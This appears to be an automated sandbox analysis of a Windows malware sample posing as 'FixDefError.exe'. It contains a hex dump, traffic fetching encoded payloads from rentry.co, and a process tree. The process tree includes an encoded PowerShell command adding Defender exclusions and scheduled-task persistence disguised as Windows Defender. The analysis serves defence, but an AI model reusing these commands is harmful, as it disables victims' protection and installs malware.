00 00 00 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 06 02 00 06 32 02 c0
                                                                                                                                                                                                                    Data Ascii: 0`pP0`pP#0`pP20`pb00`p0`22020202020202
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8001INData Raw: 68 35 00 13 01 6f 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 00 00 00 01 0c 07 00 0c 42 08 30 07 60 06 70 05 50 04 c0 02 d0 00 00 01 00 00 00 01 06 02 00 06 32 02 c0 01 13 0a 00 13 01 37 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 13 0a 00 13 01 81 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 01 0e 08 00 0e b2 0a 30 09 60 08 70 07 50 06 c0 04 d0 02 e0 01 11 09 00 11 01 14 00 0a 30 09 60 08 70 07 50 06 c0 04 d0 02 e0 00 00 01 00 00 00 01 00 00 00 01 04 01 00 04 62 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 04 01 00 04 62 00 00 01 00 00 00 01 02 02 00 02 60 01 70 01 00 00 00 01 04 01 00 04 62 00 00 01 00 00 00 01 02 02 00 02 60 01 70 01 00 00 00 01 04 01 00 04 62 00 00 01 00 00 00 01 13 0a 00 13 01 17 00 0c 30 0b 60 0a 70 09 50
                                                                                                                                                                                                                    Data Ascii: h5o0`pPB0`pP270`pP0`pP0`pP0`pPbb`pb`pb0`pP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8017INData Raw: 00 00 00 00 00 00 00 19 13 0a 00 13 01 15 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff 9b 55 01 4b 97 09 3b 00 00 cf 0b 80 06 ad 1c 00 b5 13 05 e2 1c 01 9d 14 05 cc 1c 01 af 14 28 00 00 d7 15 a7 01 ad 1c 00 a6 17 03 00 00 c8 17 27 ad 1c 00 94 18 2e 00 00 83 19 2a ad 1c 00 d0 19 fc 02 00 00 dd 1c 05 ec 1c 00 f7 1c 06 00 00 01 00 00 00 00 00 00 00 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 05 02 00 05 32 01 30 01 00 00 00 01 00 00 00 01 06 02 00 06 b2 02 c0 01 06 02 00 06 b2 02 c0 01 00 00 00 01 00 00 00 01 00 00 00 01 06 02 00 06 b2 02 c0 01 00 00 00 19 13 0a 00 13 01 21 00 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff 9b 41 01 39 51 05 00 00 f7 01 05 b3 24 00 ba 02 bf 17 d2 24 00 9d 1a
                                                                                                                                                                                                                    Data Ascii: 0`pPW_UK;('.*20202020!0`pPW_A9Q$$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8033INData Raw: 07 03 00 07 42 03 30 02 c0 00 00 01 0d 07 00 0d 62 09 30 08 60 07 70 06 c0 04 d0 02 e0 00 00 19 0d 06 00 0d 52 09 30 08 c0 06 d0 04 e0 02 f0 90 57 5f 00 ff ff 01 0f 43 05 93 01 00 6c 03 98 01 00 ae 01 06 00 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 06 03 00 06 42 02 30 01 60 00 00 19 06 03 00 06 42 02 30 01 60 00 00 90 57 5f 00 ff ff 01 00 01 06 03 00 06 42 02 30 01 60 00 00 19 09 04 00 09 32 05 30 04 c0 02 d0 90 57 5f 00 ff ff 01 0a 79 05 bd 01 00 cb 01 06 00 00 00 00 19 09 04 00 09 32 05 30 04 c0 02 d0 90 57 5f 00 ff ff 01 0a 79 05 bd 01 00 cb 01 06 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 04 01 00 04 42 00 00
                                                                                                                                                                                                                    Data Ascii: B0b0`pR0W_ClB0`B0`B0`W_B0`20W_y20W_yBBBB
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8049INData Raw: 04 01 00 04 62 00 00 01 08 04 00 08 52 04 30 03 60 02 c0 01 04 01 00 04 62 00 00 01 08 04 00 08 32 04 30 03 60 02 c0 19 0a 04 00 0a 72 06 c0 04 d0 02 e0 90 57 5f 00 ff ff 01 0e 4f 05 00 00 5a 05 95 01 00 90 01 20 00 00 00 00 19 09 04 00 09 72 05 30 04 c0 02 d0 90 57 5f 00 ff ff 01 0c 21 05 00 00 2c 05 4b 00 60 06 00 00 01 05 02 00 05 32 01 30 01 08 05 00 08 62 04 30 03 60 02 70 01 50 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 06 02 00 06 32 02 c0 19 08 03 00 08 42 04 c0 02 d0 00 00 90 57 5f 00 ff ff 01 08 22 05 4d 00 48 19 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 00 00 00 19 06 03 00 06 42 02 30 01 60 00 00 90 57 5f 00 ff ff 01 00 01 00 00 00 01 06 02 00 06 32 02 c0 19 0c 07 00 0c 42 08 30 07 60 06 70 05 50 04 c0 02 d0 00 00 90 57 5f 00 ff ff 01 0a
                                                                                                                                                                                                                    Data Ascii: bR0`b20`rW_OZ r0W_!,K`20b0`pP2BW_"MHB0`B0`W_2B0`pPW_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8065INData Raw: 60 06 70 05 50 04 c0 02 d0 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 07 03 00 07 62 03 30 02 c0 00 00 01 0c 05 00 0c 42 08 c0 06 d0 04 e0 02 f0 00 00 01 00 00 00 01 00 00 00 19 10 09 00 10 82 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 90 57 5f 00 ff 9b 41 01 32 36 38 00 00 a7 01 05 c8 07 00 ac 01 05 00 00 87 04 03 83 07 03 d7 04 53 82 01 03 f7 05 03 c4 07 03 df 06 03 c6 07 03 a6 07 0a d8 07 00 d3 07 16 00 00 02 00 01 7d 00 00 00 00 00 00 b3 e2 ff 19 10 09 00 10 c2 0c 30 0b 60 0a 70 09 50 08 c0 06 d0 04 e0 02 f0 00 00 90 57 5f 00 ff 9b 31 01 22 35 94 03 00 00 9d 04 8c 01 ce 05 03 ec 05 0a 9a 06 00 8b 06 05 aa 06 00 90 06 1a 00 00 b5 06
                                                                                                                                                                                                                    Data Ascii: `pPBBBBb0B0`pPW_A268S}0`pPW_1"5
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8081INData Raw: 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 45 76 65 6e 74 73 00 bb 02 47 65 74 50 72 69 6f 72 69 74 79 43 6c 61 73 73 00 00 c6 02 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 c7 02 47 65 74 50 72 6f 63 65 73 73 41 66 66 69 6e 69 74 79 4d 61 73 6b 00 00 cc 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 d1 02 47 65 74 50 72 6f 63 65 73 73 49 6f 43 6f 75 6e 74 65 72 73 00 00 d6 02 47 65 74 50 72 6f 63 65 73 73 54 69 6d 65 73 00 e2 02 47 65 74 51 75 65 75 65 64 43 6f 6d 70 6c 65 74 69 6f 6e 53 74 61 74 75 73 00 e5 02 47 65 74 53 68 6f 72 74 50 61 74 68 4e 61 6d 65 57 00 e7 02 47 65 74 53 74 61 72 74 75 70 49 6e 66 6f 41 00 e8 02 47 65 74 53 74 61 72 74 75 70 49 6e 66 6f 57 00 ea 02 47 65 74 53 74 64 48 61 6e 64 6c 65 00 00 fa 02 47 65
                                                                                                                                                                                                                    Data Ascii: NumberOfConsoleInputEventsGetPriorityClassGetProcAddressGetProcessAffinityMaskGetProcessHeapGetProcessIoCountersGetProcessTimesGetQueuedCompletionStatusGetShortPathNameWGetStartupInfoAGetStartupInfoWGetStdHandleGe
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8097INData Raw: a8 78 a8 88 a8 98 a8 a8 a8 b8 a8 c8 a8 d8 a8 e8 a8 f8 a8 08 a9 18 a9 28 a9 38 a9 48 a9 58 a9 68 a9 78 a9 88 a9 98 a9 a8 a9 b8 a9 c8 a9 d8 a9 e8 a9 f8 a9 08 aa 18 aa 28 aa 38 aa 48 aa 58 aa 68 aa 78 aa 88 aa 98 aa a8 aa b8 aa c8 aa d8 aa e8 aa f8 aa 08 ab 18 ab 28 ab 38 ab 48 ab 58 ab 68 ab 78 ab 88 ab 98 ab a8 ab b8 ab c8 ab d8 ab e8 ab f8 ab 08 ac 18 ac 28 ac 38 ac 48 ac 58 ac 68 ac 78 ac 88 ac 98 ac a8 ac b8 ac c8 ac d8 ac e8 ac f8 ac 08 ad 18 ad 28 ad 38 ad 48 ad 58 ad 68 ad 78 ad 88 ad 98 ad a8 ad b8 ad c8 ad d8 ad e8 ad f8 ad 08 ae 18 ae 28 ae 38 ae 48 ae 58 ae 68 ae 78 ae 88 ae 98 ae a8 ae b8 ae c8 ae d8 ae e8 ae f8 ae 08 af 18 af 28 af 38 af 48 af 58 af 68 af 78 af 88 af 98 af a8 af b8 af c8 af d8 af e8 af f8 af 00 00 69 00 cc 01 00 00 08 a0 18 a0
                                                                                                                                                                                                                    Data Ascii: x(8HXhx(8HXhx(8HXhx(8HXhx(8HXhx(8HXhx(8HXhxi
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC8113INData Raw: ae 98 ae a8 ae b8 ae c8 ae d8 ae e8 ae f8 ae 08 af 18 af 28 af 38 af 48 af 58 af 68 af 78 af 88 af 00 00 00 b0 6e 00 90 00 00 00 68 a4 78 a4 88 a4 98 a4 a8 a4 b8 a4 c8 a4 d8 a4 e8 a4 f8 a4 08 a5 18 a5 28 a5 38 a5 48 a5 58 a5 68 a5 78 a5 88 a5 98 a5 a8 a5 b8 a5 c8 a5 d8 a5 e8 a5 f8 a5 08 a6 18 a6 28 a6 38 a6 48 a6 58 a6 68 a6 78 a6 88 a6 98 a6 a8 a6 b8 a6 c8 a6 d8 a6 e8 a6 f8 a6 08 a7 18 a7 28 a7 38 a7 48 a7 58 a7 68 a7 78 a7 88 a7 98 a7 a8 a7 b8 a7 c8 a7 d8 a7 e8 a7 f8 a7 08 a8 18 a8 28 a8 38 a8 48 a8 58 a8 68 a8 78 a8 88 a8 98 a8 00 c0 6e 00 ec 00 00 00 28 a2 38 a2 48 a2 58 a2 68 a2 78 a2 88 a2 98 a2 a8 a2 b8 a2 c8 a2 d8 a2 e8 a2 f8 a2 08 a3 18 a3 28 a3 38 a3 48 a3 58 a3 68 a3 78 a3 88 a3 98 a3 a8 a3 b8 a3 c8 a3 d8 a3 e8 a3 f8 a3 08 a4 18 a4 28 a4 38 a4
                                                                                                                                                                                                                    Data Ascii: (8HXhxnhx(8HXhx(8HXhx(8HXhx(8HXhxn(8HXhx(8HXhx(8


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    7192.168.2.349692198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:52 UTC8125OUTGET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1
                                                                                                                                                                                                                    Host: rentry.co
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:52 UTC8125INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:52 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 2169
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    Cache-Control:
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                    2023-03-18 23:17:52 UTC8126INData Raw: 77 6d 6b 4b 62 59 70 59 4c 66 47 68 54 6c 67 78 69 74 71 2f 74 32 50 5a 4b 57 74 65 53 43 78 39 6e 57 34 6a 62 5a 6d 64 30 59 6b 6a 37 64 55 6b 49 4b 45 56 4d 71 61 65 6c 66 37 48 63 35 56 71 49 58 52 75 32 76 30 55 4e 59 51 61 55 70 7a 5a 61 4b 4d 7a 74 65 62 32 77 54 37 55 55 68 79 50 51 58 76 4a 74 43 63 79 75 79 4a 31 4a 32 76 48 37 41 4a 77 38 78 59 44 54 43 73 47 67 6e 6a 51 51 44 55 6b 69 67 4a 62 45 52 30 5a 0a 50 32 59 50 50 68 44 7a 32 4b 67 57 30 49 56 77 4c 52 6e 57 34 71 74 33 59 75 46 36 78 38 4e 5a 35 78 6f 58 6d 71 6d 7a 33 37 46 43 6f 78 6a 54 48 57 6b 74 2b 58 33 2b 79 32 6f 56 57 4f 30 34 77 4c 75 35 45 68 72 6f 50 4e 49 7a 67 63 6a 6f 63 79 73 57 78 43 33 52 34 52 59 77 33 41 6f 57 74 48 4c 75 48 74 52 77 72 39 50 68 32 6c 4f 4a 4f 2f
                                                                                                                                                                                                                    Data Ascii: wmkKbYpYLfGhTlgxitq/t2PZKWteSCx9nW4jbZmd0Ykj7dUkIKEVMqaelf7Hc5VqIXRu2v0UNYQaUpzZaKMzteb2wT7UUhyPQXvJtCcyuyJ1J2vH7AJw8xYDTCsGgnjQQDUkigJbER0ZP2YPPhDz2KgW0IVwLRnW4qt3YuF6x8NZ5xoXmqmz37FCoxjTHWkt+X3+y2oVWO04wLu5EhroPNIzgcjocysWxC3R4RYw3AoWtHLuHtRwr9Ph2lOJO/


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    8192.168.2.349694198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:56 UTC8128OUTGET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1
                                                                                                                                                                                                                    Host: rentry.co
                                                                                                                                                                                                                    2023-03-18 23:17:56 UTC8128INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:56 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 2169
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    Cache-Control:
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                    2023-03-18 23:17:56 UTC8128INData Raw: 77 6d 6b 4b 62 59 70 59 4c 66 47 68 54 6c 67 78 69 74 71 2f 74 32 50 5a 4b 57 74 65 53 43 78 39 6e 57 34 6a 62 5a 6d 64 30 59 6b 6a 37 64 55 6b 49 4b 45 56 4d 71 61 65 6c 66 37 48 63 35 56 71 49 58 52 75 32 76 30 55 4e 59 51 61 55 70 7a 5a 61 4b 4d 7a 74 65 62 32 77 54 37 55 55 68 79 50 51 58 76 4a 74 43 63 79 75 79 4a 31 4a 32 76 48 37 41 4a 77 38 78 59 44 54 43 73 47 67 6e 6a 51 51 44 55 6b 69 67 4a 62 45 52 30 5a 0a 50 32 59 50 50 68 44 7a 32 4b 67 57 30 49 56 77 4c 52 6e 57 34 71 74 33 59 75 46 36 78 38 4e 5a 35 78 6f 58 6d 71 6d 7a 33 37 46 43 6f 78 6a 54 48 57 6b 74 2b 58 33 2b 79 32 6f 56 57 4f 30 34 77 4c 75 35 45 68 72 6f 50 4e 49 7a 67 63 6a 6f 63 79 73 57 78 43 33 52 34 52 59 77 33 41 6f 57 74 48 4c 75 48 74 52 77 72 39 50 68 32 6c 4f 4a 4f 2f
                                                                                                                                                                                                                    Data Ascii: wmkKbYpYLfGhTlgxitq/t2PZKWteSCx9nW4jbZmd0Ykj7dUkIKEVMqaelf7Hc5VqIXRu2v0UNYQaUpzZaKMzteb2wT7UUhyPQXvJtCcyuyJ1J2vH7AJw8xYDTCsGgnjQQDUkigJbER0ZP2YPPhDz2KgW0IVwLRnW4qt3YuF6x8NZ5xoXmqmz37FCoxjTHWkt+X3+y2oVWO04wLu5EhroPNIzgcjocysWxC3R4RYw3AoWtHLuHtRwr9Ph2lOJO/


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    9192.168.2.349698198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:19:21 UTC8130OUTGET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: rentry.co
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:19:21 UTC8131INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:19:21 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 2114
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    Cache-Control:
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                    2023-03-18 23:19:21 UTC8131INData Raw: 41 49 6f 42 38 70 66 79 6c 31 53 6d 6e 42 6c 6a 51 61 35 32 68 51 33 70 73 2b 2b 37 4a 4b 6a 4a 6c 77 33 46 68 36 36 4b 55 2f 58 74 5a 77 53 34 32 4d 4d 73 76 76 41 51 6f 4e 6f 70 31 6c 2f 58 2b 46 6a 49 76 45 4e 75 33 69 68 59 31 35 63 38 76 6b 57 4d 72 52 72 6f 51 61 57 38 77 6f 4a 76 41 35 69 67 65 72 69 61 50 6e 46 56 41 38 46 33 63 33 66 30 4a 2b 46 48 45 65 75 73 7a 30 50 50 64 74 47 58 72 72 6d 54 37 68 76 4f 0a 43 57 63 4a 33 30 4e 4d 54 47 43 35 78 68 65 6f 51 4b 4c 69 65 4d 79 65 6d 38 67 36 66 79 52 48 61 44 39 44 6b 49 4d 47 6b 58 72 48 68 64 4a 42 44 78 37 35 63 41 37 75 67 57 44 56 6b 46 55 46 5a 2f 70 78 41 33 58 47 33 2b 53 4e 73 39 72 44 2b 71 50 49 6a 74 70 6c 39 45 46 4d 67 76 57 6c 39 4a 53 55 33 70 68 4a 6c 6c 6c 63 59 43 2b 46 55 65
                                                                                                                                                                                                                    Data Ascii: AIoB8pfyl1SmnBljQa52hQ3ps++7JKjJlw3Fh66KU/XtZwS42MMsvvAQoNop1l/X+FjIvENu3ihY15c8vkWMrRroQaW8woJvA5igeriaPnFVA8F3c3f0J+FHEeusz0PPdtGXrrmT7hvOCWcJ30NMTGC5xheoQKLieMyem8g6fyRHaD9DkIMGkXrHhdJBDx75cA7ugWDVkFUFZ/pxA3XG3+SNs9rD+qPIjtpl9EFMgvWl9JSU3phJlllcYC+FUe


                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:00:17:02
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                                                                                                                    Imagebase:0x560000
                                                                                                                                                                                                                    File size:2393088 bytes
                                                                                                                                                                                                                    MD5 hash:1B664F2A0BEDE6C47E44CA8C0AAD3DE7
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                    Start time:00:17:04
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
                                                                                                                                                                                                                    Imagebase:0x750000
                                                                                                                                                                                                                    File size:471552 bytes
                                                                                                                                                                                                                    MD5 hash:0326F45523014399DEA91452C957B5E0
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                    • Detection: 31%, ReversingLabs
                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                    Start time:00:17:11
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:00:17:11
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:00:17:12
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
                                                                                                                                                                                                                    Imagebase:0xeb0000
                                                                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:00:17:14
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                    Start time:00:17:14
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:00:17:15
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
